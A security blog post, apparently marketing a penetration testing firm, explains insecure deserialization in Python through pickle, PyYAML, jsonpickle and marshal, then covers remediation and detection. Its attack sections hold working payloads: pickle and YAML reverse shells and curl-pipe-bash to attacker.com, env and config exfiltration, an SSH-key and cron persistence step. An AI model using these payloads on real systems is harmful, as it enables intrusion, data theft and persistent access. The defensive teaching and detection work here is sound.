If you are a developer, security engineer, or architect working with Python applications, understanding this vulnerability class is not optional. It is a prerequisite for building systems that survive contact with real-world adversaries.
This blog walks you through what insecure deserialization is, how attackers exploit it in Python, working proof-of-concept commands, and how to remediate it before it costs you.
What Is Serialization and Why Does It Matter
Serialization is the process of converting an in-memory object into a format that can be stored or transmitted, such as a byte stream, JSON blob, or XML document. Deserialization is the reverse: reconstructing the object from that format back into memory.
This is used everywhere: session tokens, API payloads, caching layers, message queues, inter-process communication, and file storage. When the deserialization process trusts external input without validation, attackers can supply a crafted payload that forces the application to execute arbitrary code, escalate privileges, or exfiltrate data.
The root problem is not the concept of serialization itself. It is when applications deserialize data from untrusted sources using libraries that execute code during the reconstruction process.
Python's Most Dangerous Serialization Libraries
The pickle Module
Python's built-in pickle module is the most notorious offender. The official Python documentation itself warns that pickle is not secure against maliciously constructed data. Despite this, it remains widely used in data science pipelines, ML model storage, caching systems, and session management.
Pickle allows objects to define a __reduce__ method that controls how they are serialized and, critically, deserialized. Attackers abuse this to embed OS commands inside a pickled payload.
Generating a malicious pickle payload:
import pickle
import os
class MaliciousPayload(object):
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(MaliciousPayload())
print(payload)
Triggering execution on the target:
import pickle
# Simulating what a vulnerable application does
data = b'\x80\x04\x95...' # Attacker-supplied bytes
pickle.loads(data) # This executes: os.system('id')
When the application calls pickle.loads() on attacker-controlled data, the command runs. There is no sandbox. There is no prompt. The payload executes in the context of the running process.
Reverse shell via pickle:
import pickle
import os
class ReverseShell(object):
def __reduce__(self):
cmd = "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
return (os.system, (cmd,))
payload = pickle.dumps(ReverseShell())
# On attacker machine: nc -lvnp 4444
# Victim app receives and loads this payload
This is not theoretical. This exact technique has been used to compromise ML serving platforms, Flask-based APIs using pickled sessions, and internal tooling that caches Python objects.
If your organization's Python applications are handling serialized data from external sources, you need a professional assessment to determine your exposure. Redfox Cybersecurity's penetration testing services cover deserialization attack chains as part of a comprehensive web application engagement.
PyYAML and the yaml.load() Vulnerability
YAML is used everywhere for configuration files, CI/CD pipelines, and API data. PyYAML's yaml.load() function, when called without a safe loader, supports Python-specific tags that allow object instantiation during parsing.
Vulnerable code:
import yaml
data = yaml.load(user_input) # Dangerous: no Loader specified
Attacker-supplied YAML payload:
!!python/object/apply:os.system
args: ['curl http://attacker.com/shell.sh | bash']
When the application processes this string through yaml.load(), it executes the shell command. This is a one-liner exploit that requires no authentication bypass, no memory corruption, and no complex tooling.
Demonstrating the exploit:
python3 -c "
import yaml
payload = \"!!python/object/apply:os.system ['id']\"
yaml.load(payload)
"
Output: The id command executes and prints the current user context of the process.
This class of vulnerability has affected well-known projects including Ansible and various DevOps tools. Any Python application that parses YAML from user-controlled input without using yaml.safe_load() is at risk.
jsonpickle: Dangerous by Design
jsonpickle is a library that serializes arbitrary Python objects to JSON. Unlike standard JSON, it preserves Python type information by embedding class references directly in the serialized output. This makes it trivially exploitable.
Crafting a jsonpickle RCE payload:
import jsonpickle
class Exploit(object):
def __reduce__(self):
return (eval, ("__import__('os').system('id')",))
serialized = jsonpickle.encode(Exploit())
print(serialized)
# Output: {"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": [...]}]}
Any application calling jsonpickle.decode() on this string will execute the embedded command.
Sending the payload over HTTP:
curl -X POST http://target.com/api/deserialize \
-H "Content-Type: application/json" \
-d '{"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": ["__import__(\"os\").system(\"id\")"]}]}'
If the endpoint passes the body through jsonpickle.decode(), code execution is immediate.
shelve and marshal
Python's shelve module uses pickle internally to store objects, meaning any application that reads shelve databases from untrusted sources inherits all of pickle's vulnerabilities.
marshal is even more restricted: it is explicitly documented as insecure for untrusted data and should never be used to deserialize data from external sources.
import marshal
# Dangerous: deserializing attacker-controlled marshal data
code = marshal.loads(attacker_bytes)
exec(code) # Arbitrary code execution
How Attackers Identify Deserialization Vulnerabilities
Understanding the attacker's reconnaissance workflow helps defenders think like threat actors.
Step 1: Fingerprint the application stack
# Look for Python framework indicators in HTTP headers
curl -I http://target.com
# Check for Flask, Django, FastAPI signatures
# X-Powered-By, Server headers, error pages
Step 2: Intercept and decode serialized tokens
# Base64-decode suspicious cookies or parameters
echo "gASVHgAAAAAAAAB9lCiMAmlklEsBjARuYW1llIwFYWRtaW6Uu..." | base64 -d | xxd | head
The magic bytes \x80\x04 or \x80\x03 at the start indicate a pickle payload. Attackers immediately know what library to target.
Step 3: Generate and encode the exploit payload
import pickle, os, base64
class Exploit:
def __reduce__(self):
return (os.system, ('curl http://attacker.com/exfil?u=$(whoami)',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)
Step 4: Deliver the payload
# Inject into a cookie
curl http://target.com/dashboard \
-H "Cookie: session=gASV..."
# Inject into a POST parameter
curl -X POST http://target.com/api/upload \
-d "data=gASV..."
Step 5: Catch the callback
# On attacker machine, start a listener
nc -lvnp 80
# Or use a Burp Collaborator / interactsh instance
This five-step chain is what a real attacker executes. The window between an unpatched deserialization endpoint and full server compromise is minutes, not hours.
Want to know if your applications are vulnerable to this exact chain before attackers find it? Request a penetration test from Redfox Cybersecurity and get a professional, evidence-based assessment of your attack surface.
Real-World Impact: What Attackers Do After Initial Access
Gaining code execution through a deserialization vulnerability is only the beginning. Post-exploitation steps commonly include:
Privilege escalation:
# Check sudo rights
sudo -l
# Look for SUID binaries
find / -perm -4000 2>/dev/null
# Check for writable cron jobs
ls -la /etc/cron*
Lateral movement within the network:
# Scan internal network from the compromised host
python3 -c "
import socket
for port in [22, 80, 443, 3306, 5432, 6379, 27017]:
s = socket.socket()
s.settimeout(0.5)
result = s.connect_ex(('10.0.0.1', port))
if result == 0:
print(f'Port {port} open')
s.close()
"
Data exfiltration:
# Dump environment variables (often contains secrets, API keys, DB credentials)
env | base64 | curl -X POST http://attacker.com/collect -d @-
# Steal application secrets
cat /app/config.py | base64 | curl -X POST http://attacker.com/collect -d @-
Persistence:
# Add SSH key to authorized_keys
echo "ssh-rsa AAAA...attacker-key..." >> ~/.ssh/authorized_keys
# Write a cron job for persistent reverse shell
echo "* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1" | crontab -
A single deserialization endpoint can be the entry point for a full organizational breach. This is not a theoretical risk. It is the documented kill chain behind multiple high-profile ransomware deployments and data theft incidents.
Secure Remediation: How to Fix Insecure Deserialization in Python
Never Deserialize Untrusted Data with pickle
The simplest fix is to never use pickle, shelve, or marshal with data from external sources. There is no safe way to sandbox pickle deserialization in Python.
Switch to safer alternatives for data interchange:
import json
# Serialize
data = {"user_id": 1, "role": "admin"}
serialized = json.dumps(data)
# Deserialize safely
parsed = json.loads(serialized)
JSON, msgpack, and protobuf are appropriate formats for transmitting structured data between services. They do not execute code during parsing.
Use yaml.safe_load() Instead of yaml.load()
import yaml
# Vulnerable
data = yaml.load(user_input)
# Secure
data = yaml.safe_load(user_input)
yaml.safe_load() only parses standard YAML types (strings, integers, lists, dicts) and does not support Python-specific tags that allow object instantiation.
Validate and Sign Serialized Data
If you must use pickle internally (for example, in ML pipelines where models are serialized), implement cryptographic signing to verify integrity before deserialization.
import pickle
import hmac
import hashlib
SECRET_KEY = b'your-secret-key-here'
def serialize_signed(obj):
data = pickle.dumps(obj)
signature = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest()
return signature.encode() + b':' + data
def deserialize_verified(blob):
sig, data = blob.split(b':', 1)
expected_sig = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest()
if not hmac.compare_digest(sig.decode(), expected_sig):
raise ValueError("Invalid signature: data may have been tampered with")
return pickle.loads(data)
This ensures that only data serialized by your own application can be deserialized. Attacker-crafted payloads will fail the signature check before pickle.loads() is ever called.
Implement Allowlist-Based Deserialization
For cases where you need to support custom object types, use a custom unpickler that restricts which classes can be instantiated.
import pickle
import io
ALLOWED_CLASSES = {
('myapp.models', 'UserSession'),
('myapp.models', 'CartItem'),
}
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if (module, name) not in ALLOWED_CLASSES:
raise pickle.UnpicklingError(
f"Blocked: {module}.{name} is not in the allowlist"
)
return super().find_class(module, name)
def safe_loads(data):
return RestrictedUnpickler(io.BytesIO(data)).load()
This approach stops arbitrary class instantiation while still allowing your application's own object types to be deserialized.
Adopt Structured Serialization Formats
For service-to-service communication, move to schema-validated formats:
# Using Protocol Buffers
from google.protobuf import message
# Using Pydantic for schema validation
from pydantic import BaseModel
class UserPayload(BaseModel):
user_id: int
role: str
permissions: list[str]
# Validation happens automatically; no code execution possible
user = UserPayload(**json.loads(incoming_data))
Pydantic validates structure and types but does not instantiate arbitrary Python classes. It is a safe, production-grade alternative for API payload validation.
Detection: How to Find Deserialization Vulnerabilities in Your Codebase
Grep for dangerous patterns in your Python codebase:
# Find all pickle usage
grep -rn "pickle.loads\|pickle.load\|cPickle.loads" ./src
# Find unsafe YAML loading
grep -rn "yaml.load(" ./src | grep -v "safe_load"
# Find jsonpickle decode calls
grep -rn "jsonpickle.decode\|jsonpickle.loads" ./src
# Find marshal usage
grep -rn "marshal.loads\|marshal.load" ./src
# Find shelve usage with external data
grep -rn "shelve.open" ./src
Automate static analysis with Bandit:
pip install bandit
bandit -r ./src -t B301,B302,B303,B304,B506
Bandit rule B301 flags pickle calls, B506 flags unsafe yaml.load(). Integrate this into your CI/CD pipeline so vulnerabilities are caught before they reach production.
Dynamic scanning with custom payloads:
# Generate a detection payload that makes an out-of-band DNS request
python3 -c "
import pickle, os, base64
class Probe:
def __reduce__(self):
return (os.system, ('nslookup your-collaborator-id.oast.me',))
print(base64.b64encode(pickle.dumps(Probe())).decode())
"
Inject this into every parameter, cookie, and request body that appears to accept serialized data. If you receive a DNS callback, the endpoint is vulnerable.
Running these detection steps manually across a large application surface is time-intensive and easy to miss. Professional penetration testing automates and validates this process across your entire attack surface. Engage Redfox Cybersecurity to conduct a thorough assessment of your Python applications, APIs, and internal tooling.
Closing Thoughts
Insecure deserialization in Python is not a niche vulnerability. It sits at the intersection of trusted libraries, common development patterns, and catastrophic impact. The Python ecosystem's reliance on pickle for ML model storage, session management, and caching means that the exposure is far broader than most development teams realize.
The attack primitives are well-documented, the tooling is publicly available, and the path from a deserialization endpoint to full server compromise is short. Developers need to treat serialized data from external sources the same way they treat SQL input: as inherently untrusted, requiring explicit validation and safe handling patterns.
Remediation starts with code: replace pickle with JSON or protobuf, switch yaml.load to yaml.safe_load, validate schemas with Pydantic, and integrate Bandit into your CI pipeline. But code review alone does not find everything. Runtime behavior, third-party dependencies, and undocumented internal endpoints often carry deserialization vulnerabilities that static analysis cannot surface.
That is where professional security testing closes the gap. Redfox Cybersecurity's penetration testing services combine automated scanning with manual exploitation techniques to identify deserialization vulnerabilities, prove impact through controlled exploitation, and deliver actionable remediation guidance your engineering team can act on immediately.
Do not wait for a breach to discover your exposure. Get ahead of it.